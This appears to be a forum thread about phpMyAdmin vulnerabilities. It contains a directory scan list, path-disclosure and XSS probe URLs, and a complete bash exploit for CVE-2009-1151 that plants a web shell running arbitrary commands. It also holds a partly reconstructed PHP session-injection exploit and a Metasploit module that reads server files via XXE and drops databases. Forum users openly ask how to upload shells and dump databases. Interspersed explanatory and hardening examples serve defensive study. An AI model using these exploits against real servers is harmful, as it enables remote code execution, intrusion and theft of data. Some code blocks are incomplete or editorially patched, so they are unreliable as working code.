/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
Regarding the phpMyAdmin (/scripts/setup.php) PHP Code Injection vulnerability, I'll add that phpMyAdmin 2.8.x is vulnerable as well.
Tested on phpMyAdmin 2.8.0.3. The main thing is that write permissions are in place (
Regarding full path disclosure
In recent versions the phpMyAdmin root contains a phpinfo.php file with the corresponding content, and as a rule admins don't delete it
libraries/config.default.php
$cfg['ShowPhpInfo'] = false;
It all depends on the settings; it's off by default.
phpMyAdmin SQL bookmark HTML Injection Vulnerability
Bugtraq ID: 35543
Class: Input Validation Error
CVE: CVE-2009-2284
Remote: Yes
Local: No
Published: Jun 30 2009 12:00AM
Updated: Aug 21 2009 03:57PM
Credit: Sven Vetsch
Vulnerable: RedHat Fedora 9 0
RedHat Fedora 11
RedHat Fedora 10
phpMyAdmin phpMyAdmin 3.1.1.1
phpMyAdmin phpMyAdmin 3.1.1.0
phpMyAdmin phpMyAdmin 3.1.0
phpMyAdmin phpMyAdmin 3.0.1
phpMyAdmin phpMyAdmin 3.0
phpMyAdmin phpMyAdmin 3.2.0-rc1
phpMyAdmin phpMyAdmin 3.1.3.2
phpMyAdmin phpMyAdmin 3.1.3.1
phpMyAdmin phpMyAdmin 3.0.1.1
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
I couldn't find an exploit or a more specific description online. I dug around myself:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
how to find out the exact phpMyAdmin version
Xcontrol212
16.12.2009, 21:49
Path disclosure
phpMyAdmin 2.6.1
http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='
Fatal error: Call to undefined function PMA_reloadNavigation() in Z:\home\localhost\www\Tools\phpmyadmin\header.inc.php on line 132
Vulnerable part:
function PMA_reloadNavigation() {
global $cfg;
// Reloads the navigation frame via JavaScript if required
if (isset($GLOBALS['reload']) && $GLOBALS['reload']) {
echo "\n";
$reload_url = './left.php?' . PMA_generate_common_url((isset($GLOBALS['db']) ? $GLOBALS['db'] : ''), '', '&');
?>
<script type="text/javascript" language="javascript1.2">
<!--
if (typeof(window.parent) != 'undefined'
&& typeof(window.parent.frames['nav']) != 'undefined') {
window.parent.frames['nav'].goTo('<?php echo $reload_url; ?>&hash=' + <?php echo (($cfg['QueryFrame'] && $cfg['QueryFrameJS']) ? 'window.parent.frames[\'queryframe\'].document.hashform.hash.value' : "'" . md5($cfg['PmaAbsoluteUri']) . "'"); ?>);
}
//-->
</script>
<?php
unset($GLOBALS['reload']);
}
}
UPD
http://localhost/Tools/phpMyAdmin/footer.inc.php
Notice: Undefined variable: cfg in Z:\home\localhost\www\Tools\phpmyadmin\footer.inc.php on line 17
Vulnerable code:
<?php
/* $Id$ */
// vim: expandtab sw=4 ts=4 sts=4:
/**
* WARNING: This script has to be included at the very end of your code because
* it will stop the script execution!
*/
require_once('./libraries/relation.lib.php'); // for PMA_setHistory()
/**
* Query window
*/
// If query window is wanted and open, update with latest selected db/table.
if ($cfg['QueryFrame'] && $cfg['QueryFrameJS']) {
?>
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php
Fatal error: Call to undefined function PMA_DBI_select_db() in Z:\home\localhost\www\Tools\phpmyadmin\mult_submits.inc.php on line 385
Vulnerable code:
if ($run_parts) {
$sql_query .= $a_query . ';' . "\n";
if ($query_type != 'drop_db') {
PMA_DBI_select_db($db);
}
$result = @PMA_DBI_query($a_query) or PMA_mysqlDie('', $a_query, FALSE, $err_url);
} // end if
} // end for
if ($use_sql) {
require('./sql.php');
} elseif (!$run_parts) {
PMA_DBI_select_db($db);
$result = PMA_DBI_query($sql_query);
}
}
?>
(C)Xcontrol212
Xcontrol212
17.12.2009, 02:15
how to find out the exact phpMyAdmin version
Via changelog.php
Example:
http://87.106.94.86/phpmyadmin/changelog.php
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E
path disclosure in 3.* versions
Fatal error: Call to undefined function pma_issuperuser() in /www/html/pma/libraries/check_user_privileges.lib.php on line 16
Tested on version 3.2.0.1
It looks like they patched the XSS, but as usual got something else instead, in our case path disclosure ;)
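The path-disclosure findings in this post, and the lang[]=, db[]= and direct-library-file vectors listed in the overview at the top of the thread, all come from the same three gaps: library files that execute when requested directly, parameters that arrive as arrays where a string was expected, and PHP errors rendered to the client together with the absolute path. The following is an added example, not phpMyAdmin's code (the defined-constant guard is the same pattern phpMyAdmin's own library files adopted); the function names are hypothetical and the request data is constructed.

```php
<?php
// Added example, not phpMyAdmin's code. Function names are hypothetical;
// the request data below is constructed.
declare(strict_types=1);

// 1. Library files: refuse to execute unless a real entry point included us.
//    Each public script does define('PHPMYADMIN', true) before any require;
//    a library reached directly via the URL sees no constant and stops
//    before it can call an undefined function and leak the script path.
function library_may_run(): bool
{
    return defined('PHPMYADMIN');
}
// At the top of every libraries/*.php file:
//     if (!library_may_run()) { http_response_code(403); exit; }

// 2. Parameters: accept only strings. "lang[]=" turns $_GET['lang'] into an
//    array, and the first string function that touches it emits a warning
//    (or a TypeError under PHP 8) that carries the absolute path.
function scalar_param(array $source, string $name, string $default = ''): string
{
    $value = $source[$name] ?? $default;
    return is_string($value) ? $value : $default;
}

// 3. Errors: log them with the path, never render them. display_errors=0 in
//    php.ini is the real control; the handler backs it up and records what
//    would otherwise have been printed into the page.
$captured = [];
error_reporting(E_ALL);
ini_set('display_errors', '0');
set_error_handler(function (int $errno, string $errstr, string $errfile, int $errline) use (&$captured): bool {
    $captured[] = sprintf('[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline);
    return true;   // handled: nothing reaches the client
});

// --- Demonstration with constructed request data ---------------------------
$get = ['lang' => ['x'], 'db' => 'information_schema'];

// Direct library request: no entry point defined the constant.
var_dump(library_may_run());                  // bool(false)

// Array where a string was expected: the default wins, no warning raised.
var_dump(scalar_param($get, 'lang', 'en'));   // string(2) "en"
var_dump(scalar_param($get, 'db'));           // string(18) "information_schema"

// The careless version, for comparison: the concatenation raises
// "Array to string conversion", which the handler logs instead of printing.
$leaky = 'Lang: ' . $get['lang'];
var_dump($leaky);                             // string(11) "Lang: Array"
var_dump(count($captured));                   // int(1)
echo "logged server-side only: {$captured[0]}\n";
```

The guard removes the whole class of "include a library file by URL" findings (header.inc.php, footer.inc.php, mult_submits.inc.php, check_user_privileges.lib.php above), the scalar check removes the array-parameter class, and the error policy makes whatever slips past the first two invisible to the client. The phpinfo.php / $cfg['ShowPhpInfo'] note earlier in the thread is the same principle applied to a feature rather than a bug: anything that prints server internals stays off unless an administrator turns it on.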
necros555
17.03.2010, 01:48
http://tools.hostcommander.net/phpmyadmin/scripts/setup.php
with this kind of access, what can be done? is there some way to upload a shell or dump the database?
Pashkela
17.03.2010, 02:57
http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
Sidarovich1975
11.04.2010, 11:36
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
#!/bin/bash
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)
# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
if [[ $# -ne 1 ]]
then
echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
exit 1
fi
if ! which curl >/dev/null
then
echo "sorry but you need curl for this script to work!"
echo "on Debian/Ubuntu: sudo apt-get install curl"
exit 1
fi
# $1 = setup form token, $2 = cookie jar, $3 = phpMyAdmin base URL
function exploit {
# serialized config array; the "host" array key (s:23) carries PHP code that the
# unpatched setup.php copies unescaped into config/config.inc.php
postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
# same trick with a longer key (s:136): drops a tiny web shell, ?c=<shell command> and ?p=<php code>
postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
echo "[+] attempting to inject phpinfo() ..."
curl -ks -b "$2" -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
# the generated config file is served from the web root, so the injected call shows up in its output
if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
then
curl -ks --url "$3/config/config.inc.php" >"$flag"
echo "[+] success! phpinfo() injected successfully! output saved on $flag"
curl -ks -b "$2" -d "$postdata2" --url "$3/scripts/setup.php" >/dev/null
echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
echo " $3/config/config.inc.php?c=ls+-l+/"
echo " $3/config/config.inc.php?p=phpinfo();"
echo " please send any feedback/improvements for this script to"\
"unknown.pentester<AT_sign__here>gmail.com"
else
echo "[+] no luck injecting to $3/config/config.inc.php :("
exit 1
fi
}
# end of exploit function
cookiejar="/tmp/$(basename $0).$RANDOM.txt"
# the setup page sets the phpMyAdmin cookie and embeds the form token in its HTML
token=$(curl -ks -c "$cookiejar" --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12)
echo "[+] checking if phpMyAdmin exists on URL provided ..."
if grep phpMyAdmin "$cookiejar" &>/dev/null
then
length=$(echo -n "$token" | wc -c)
# valid form token obtained?
if [[ $length -eq 32 ]]
then
echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
# attempt exploit!
exploit "$token" "$cookiejar" "$1"
else
echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
exit 1
fi
else
echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
exit 1
fi
# milw0rm.com [2009-06-09]
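Added example, not part of the script above or of phpMyAdmin: it builds the serialized "configuration" value the script POSTs to scripts/setup.php and shows why the array key turns into PHP code. The writer emulation is an assumption about the pre-fix setup.php (it is assumed to emit `$cfg['Servers'][$i]['<key>'] = <value>;` with the key copied unescaped); the serializer covers only the types the payload uses.

```python
import re


def php_serialize(value):
    """Minimal PHP serialize(): bool, int, str and dict (a PHP array, key order kept)."""
    if isinstance(value, bool):                      # bool before int: bool is an int subclass
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type %r" % type(value).__name__)


def server_block(host_key):
    """The single-server array the script sends; host_key is the attacker-chosen key."""
    return {
        host_key: "localhost",
        "extension": "mysqli",
        "connect_type": "tcp",
        "compress": False,
        "auth_type": "config",
        "user": "root",
    }


def build_configuration(host_key):
    """Value of the 'configuration' POST parameter, before URL-encoding."""
    return php_serialize({"Servers": {0: server_block(host_key)}})


def php_literal(value):
    """How a config value is written: bools as keywords, strings single-quoted and escaped."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_vulnerable(server):
    """Assumed pre-fix writer: the array KEY is interpolated without any check,
    so a key like host']=''; phpinfo();// closes the index and appends a statement."""
    return "\n".join("$cfg['Servers'][$i]['%s'] = %s;" % (k, php_literal(v))
                     for k, v in server.items())


KEY_RE = re.compile(r"^[A-Za-z0-9_]+$")


def render_hardened(server):
    """Same writer, but only plain identifier keys are accepted (the value side
    was already quoted; the key side was the sink)."""
    for key in server:
        if not KEY_RE.match(key):
            raise ValueError("rejected config key: %r" % key)
    return render_vulnerable(server)


INJECTED_KEY = "host']=''; phpinfo();//"        # the s:23 key from the script's first payload

if __name__ == "__main__":
    print(build_configuration(INJECTED_KEY))
    print(render_vulnerable(server_block(INJECTED_KEY)))
```

The first rendered line is `$cfg['Servers'][$i]['host']=''; phpinfo();//'] = 'localhost';`: everything after `//` is a comment, so the file stays valid PHP and executes the injected call when config.inc.php is requested, which is exactly what the script greps for.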
Damn, sorry for the dumb question:
but what do I run this with?
under Windows?
Red_EYEs
11.04.2010, 15:55
to:Sidarovich1975
Cygwin =)
LavKraft
10.05.2010, 09:55
#!/bin/bash under Windows :confused: Unlikely :D
абвгдешка
12.07.2011, 11:01
phpMyAdmin
<?php
/* Settings */
// The settings block did not survive on the page (only its trailing comment "//PHP code to execute" is left);
// $pmaurl is needed below, so a placeholder is supplied here.
$pmaurl = 'http://target.tld/phpMyAdmin/'; // phpMyAdmin base URL (placeholder)
/*-------------------------------------------EXPLOIT CODE-------------------------------------------*/
$count_redirects = 0;
$max_redirects   = 5;
// send HTTP data
// $method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, user agent,
// other headers, timeout, what to return = (0-all, 1-body, 2-headers), follow redirect = 0|1
function send_data($method, $url, $data = '', $referer_string = '', $cookie_string = '',
    $ua_string = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8',
    $other_headers = '', $timeout = 30, $show = 0, $follow_redirect = 0)
{
    global $count_redirects, $max_redirects;
    $return     = '';
    $feof_count = 0;
    $parsed_url = parse_url($url);
    $site  = $parsed_url['host'];
    $path  = isset($parsed_url['path'])  ? $parsed_url['path']  : '/';
    $query = isset($parsed_url['query']) ? $parsed_url['query'] : '';
    if (preg_match('@_$@i', $query) && !preg_match('@_$@i', $url))
        $query = rtrim($query, '_');
    if (preg_match('@_$@i', $path) && !preg_match('@_$@i', $url))
        $path = rtrim($path, '_');
    if ($method == 'GET' && !empty($data))
        $path .= '?' . $data;
    if ($method == 'GET' && !empty($query) && empty($data))
        $path .= '?' . $query;
    if ($method == 'POST' && !empty($query))
        $path .= '?' . $query;
    if ($fp = fsockopen($site, 80, $errno, $errstr, $timeout))
    {
        $out  = ($method == 'POST') ? "POST $path HTTP/1.1\r\n" : "GET $path HTTP/1.1\r\n";
        $out .= "Host: $site\r\n";
        $out .= "Content-type: application/x-www-form-urlencoded\r\n";
        $out .= "Connection: Close\r\n";
        $out .= "User-Agent: $ua_string\r\n";
        if (!empty($referer_string)) $out .= "Referer: $referer_string\r\n";
        if (!empty($cookie_string))  $out .= "Cookie: $cookie_string\r\n";
        if (!empty($other_headers))  $out .= $other_headers;
        $out .= ($method == 'POST') ? "Content-Length: " . strlen($data) . "\r\n\r\n" : "\r\n";
        fwrite($fp, ($method == 'POST') ? $out . $data : $out);
        while (!feof($fp))
        {
            if ($feof_count >= 10000)
                break;
            $return .= fread($fp, 4800);
            ++$feof_count;
        }
        fclose($fp);
        // The redirect branch was cut off on the page right after "if($count_redirects";
        // this completion follows a Location: header at most $max_redirects times.
        if ($follow_redirect && $count_redirects < $max_redirects
            && preg_match('@^Location: ([^\r\n]+)@im', $return, $loc))
        {
            ++$count_redirects;
            return send_data('GET', trim($loc[1]), '', $url, $cookie_string, $ua_string,
                             $other_headers, $timeout, $show, 1);
        }
        $split = strpos($return, "\r\n\r\n");
        if ($show == 1 && $split !== false) $return = substr($return, $split + 4); // body only
        if ($show == 2 && $split !== false) $return = substr($return, 0, $split);  // headers only
        return $return;
    }
    else
        return array('errno' => $errno, 'errstr' => $errstr);
}
$pmaurl = rtrim($pmaurl, '/') . '/index.php';
// Regards to asddas
// candidate directories for the PHP session files (absolute and relative to the web root)
$sess_path = array('/tmp/',
    '/var/tmp/',
    '/var/lib/php/',
    '/var/lib/php4/',
    '/var/lib/php5/',
    '/var/lib/php/session/',
    '/var/lib/php4/session/',
    '/var/lib/php5/session/',
    '/shared/sessions',
    '/var/php_sessions/',
    '/var/sessions/',
    '/tmp/php_sessions/',
    '/tmp/sessions/',
    '../../../tmp/',
    '../../../../tmp/',
    '../../../../../tmp/',
    '../../../../../../tmp/',
    '../../../../../../../tmp/',
    '../../../temp/',
    '../../../../temp/',
    '../../../../../temp/',
    '../../../../../../temp/',
    '../../../../../../../temp/',
    '../../../sessions/',
    '../../../../sessions/',
    '../../../../../sessions/',
    '../../../../../../sessions/',
    '../../../../../../../sessions/',
    '../../../phptmp/',
    '../../../../phptmp/',
    '../../../../../phptmp/',
    '../../../../../../phptmp/',
    '../../../../../../../phptmp/');
// 1. Token, session name and cookies
$token_page = send_data('GET', $pmaurl);
preg_match('@name="token" value="([a-f0-9]{32})"@is', $token_page, $token_array);
$token = $token_array[1];
preg_match_all('@Set-Cookie: ([^\r\n;]+)@is', $token_page, $cookie_array);
$cookie_array = implode("; ", $cookie_array[1]);
preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is', $token_page, $session_array);
$session = $session_array[1];
// 2. Session injection test: for each candidate directory, smuggle a PMA_Config object
// whose "source" points at our own session file, then check whether the next request reveals it
$sess_test_page = '';
$o = 0;
$good_inj = false;
do
{
    $inj   = $sess_path[$o] . 'sess_' . $session;
    $query = $pmaurl . '?session_to_unset=123&token=' . $token . '&_SESSION[!bla]='
           . urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:' . strlen($inj) . ':"' . $inj . '";}}');
    $sess_test_page  = send_data('GET', $query, '', $pmaurl, $cookie_array);
    $sess_test_page2 = send_data('GET', $pmaurl . '?token=' . $token, '', $pmaurl, $cookie_array);
    if (stristr($sess_test_page2, 'PMA_Config'))
    {
        $good_inj = $inj;
        flush();
        print '[+] ' . $inj . " - good path\n";
        break;
    }
    else
    {
        flush();
        print '[-] ' . $inj . " - bad path\n";
    }
    $o++;
}
while ($o < count($sess_path)); // the loop condition was cut off on the page; this is its obvious completion
// The remainder of the exploit (writing the PHP payload through the session once a good path is found)
// is not present on the page.
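Added example, not from the post above: it emulates how PHP's default "php" session serializer reads a session file back, which is the reason the `_SESSION[!bla]=|xxx|a:1:{...}` request yields a brand-new session variable `xxx` holding a `PMA_Config` object. The decoder mirrors the loop in ext/session/session.c (scan to `|`, a leading `!` means "name without value", then unserialize); the record format assumes the PHP of that era wrote the `!bla` key through unchanged, and the session file path is made up. The mini unserializer only handles the record types the payload needs.

```python
import re


class PHPObject:
    """Result of an O: record: class name plus properties."""
    def __init__(self, cls, props):
        self.cls, self.props = cls, props


def unserialize(data, pos=0):
    """Mini PHP unserialize() for N, i, b, s, a and O records; returns (value, next_pos)."""
    t = data[pos]
    if t == "N":
        return None, pos + 2
    if t in ("i", "b"):
        end = data.index(";", pos)
        n = int(data[pos + 2:end])
        return (bool(n) if t == "b" else n), end + 1
    if t == "s":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                                        # skip :"
        return data[start:start + length], start + length + 2    # skip ";
    if t in ("a", "O"):
        cls = None
        if t == "O":
            colon = data.index(":", pos + 2)
            name_len = int(data[pos + 2:colon])
            cls = data[colon + 2:colon + 2 + name_len]
            pos = colon + 2 + name_len + 2                       # skip ":
        else:
            pos += 2
        end = data.index(":", pos)
        count = int(data[pos:end])
        pos = end + 2                                            # skip :{
        items = {}
        for _ in range(count):
            key, pos = unserialize(data, pos)
            val, pos = unserialize(data, pos)
            items[key] = val
        pos += 1                                                 # skip }
        return (PHPObject(cls, items) if cls is not None else items), pos
    raise ValueError("unsupported record %r at %d" % (t, pos))


def decode_php_session(record):
    """Emulates PS_SERIALIZER_DECODE_FUNC(php): the variables PHP loads into $_SESSION."""
    session = {}
    p, end = 0, len(record)
    while p < end:
        q = record.find("|", p)                 # scan to the next name delimiter
        if q < 0:
            break
        has_value = True
        if record[p] == "!":                    # undef marker: a name with no value after it
            p += 1
            has_value = False
        name = record[p:q]
        q += 1
        if has_value:
            try:
                value, q = unserialize(record, q)
                session[name] = value
            except (ValueError, IndexError):
                pass                            # unserialize failed: variable skipped, cursor stays put
        p = q
    return session


def injected_value(sess_file):
    """The string the post stores in _SESSION[!bla] (sess_file is a made-up path)."""
    return '|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:%d:"%s";}}' % (len(sess_file), sess_file)


def session_record(sess_file):
    """What PHP wrote for $_SESSION['!bla'] = injected_value(): key, '|', serialized value."""
    value = injected_value(sess_file)
    return '!bla|s:%d:"%s";' % (len(value), value)


SAFE_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def safe_session_name(name):
    """Application-side check: refuse names that can desynchronise the 'php' serializer."""
    return SAFE_NAME.match(name) is not None
```

Walking the record `!bla|s:NN:"|xxx|a:1:{...}";`: the `!` makes the decoder treat `bla` as a name with no value, so the cursor is left at the serialized string itself; the next scan produces a bogus name `s:NN:"` whose value `xxx|...` fails to unserialize, and the scan after that reads `xxx` as a name with the array (and the `PMA_Config` object inside it) as its value. This is why phpMyAdmin letting a request choose arbitrary `$_SESSION` keys was enough, and why the check in `safe_session_name` belongs wherever user input becomes a session key.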
phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
      'Version'     => '1.0',
      'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
        The attacker must be logged in to MySQL via phpMyAdmin.
        Works on Windows and Linux Versions 3.3.X and 3.4.X},
      'References'  =>
        [
          [ 'CVE', '2011-4107' ],
          [ 'OSVDB', '76798' ],
          [ 'BID', '50497' ],
          [ 'URL', 'http://secforce.com/research/'],
        ],
      'Author'      => [ 'Marco Batista' ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('FILE', [ true, "File to read", '/etc/passwd']),
        OptString.new('USER', [ true, "Username", 'root']),
        OptString.new('PASS', [ false, "Password", 'password']),
        OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),
        OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),
        OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),
        OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),
      ], self.class)
  end

  # Fetches the session cookies, logs in and returns [cookie header, form token]
  def loginprocess
    # HTTP GET to obtain the session values
    getresponse = send_request_cgi({
      'uri'     => datastore['APP']+'/index.php',
      'method'  => 'GET',
      'version' => '1.1',
    }, 25)
    if getresponse.nil?
      print_error("no response for #{rhost}:#{rport}")
      return nil
    elsif getresponse.code == 200
      print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
    elsif getresponse.code == 302 or getresponse.code == 301
      print_status("Received #{getresponse.code} to #{getresponse.headers['Location']}")
    else
      print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
    end
    valuesget = getresponse.headers["Set-Cookie"]
    varsget = valuesget.split(" ")
    # the cookies needed for the login request
    phpMyAdmin = varsget.grep(/phpMyAdmin/).last
    pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
    # end HTTP GET

    # login POST request to obtain the authenticated cookies and the token
    postresponse = send_request_cgi({
      'uri'     => datastore['APP']+'/index.php',
      'method'  => 'POST',
      'version' => '1.1',
      'headers' => {
        'Content-Type' => 'application/x-www-form-urlencoded',
        'Cookie'       => "#{pma_mcrypt_iv} #{phpMyAdmin}"
      },
      'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
    }, 25)
    # the token is either embedded in the page or carried in the redirect Location
    if postresponse["Location"].nil?
      tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last
      print_status("Token: #{tokenvalue}")
    else
      tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
    end
    valuespost = postresponse.headers["Set-Cookie"]
    varspost = valuespost.split(" ")
    # the authenticated cookies
    pmaUser = varspost.grep(/pmaUser-1/).last
    pmaPass = varspost.grep(/pmaPass-1/).last
    return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}", tokenvalue
    # end of login POST request
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError => e
    print_error(e.message)
  rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
    print_error(e.message)
  end

  # Reads the file back through the export function: the entity expanded into
  # the imported row, so dumping the table dumps the file
  def readfile(cookie, tokenvalue)
    getfiles = send_request_cgi({
      'uri'     => datastore['APP']+'/export.php',
      'method'  => 'POST',
      'version' => '1.1',
      'headers' => {
        'Cookie' => cookie
      },
      'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60'+datastore['TBL']+'%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
    }, 25)
    if getfiles.body.split("\n").grep(/== Dumping data for table/).empty?
      print_error("Error reading the file... not enough privilege? login error?")
    else
      print_status("#{getfiles.body}")
    end
  end

  def dropdatabase(cookie, tokenvalue)
    send_request_cgi({
      'uri'     => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
      'method'  => 'GET',
      'version' => '1.1',
      'headers' => {
        'Cookie' => cookie
      },
    }, 25)
    print_status("Dropping database: "+datastore['DB'])
  end

  def run
    cookie, tokenvalue = loginprocess()
    return if cookie.nil?
    print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")

    # multipart/form-data body carrying the crafted XML import file. The markup of
    # these lines did not survive on the page: only the boundary, the end of the
    # DOCTYPE (which declares the external entity 'conteudo' for datastore['FILE'])
    # and the entity reference inside the table data are left, so the body as
    # reproduced here is incomplete.
